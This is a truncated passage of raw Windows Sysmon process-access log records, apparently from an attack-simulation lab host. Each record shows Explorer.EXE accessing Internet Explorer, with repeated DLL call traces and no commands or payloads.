923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64) 10341000x800000000000000013681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64) 10341000x800000000000000013677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64) 10341000x800000000000000013673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.287{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 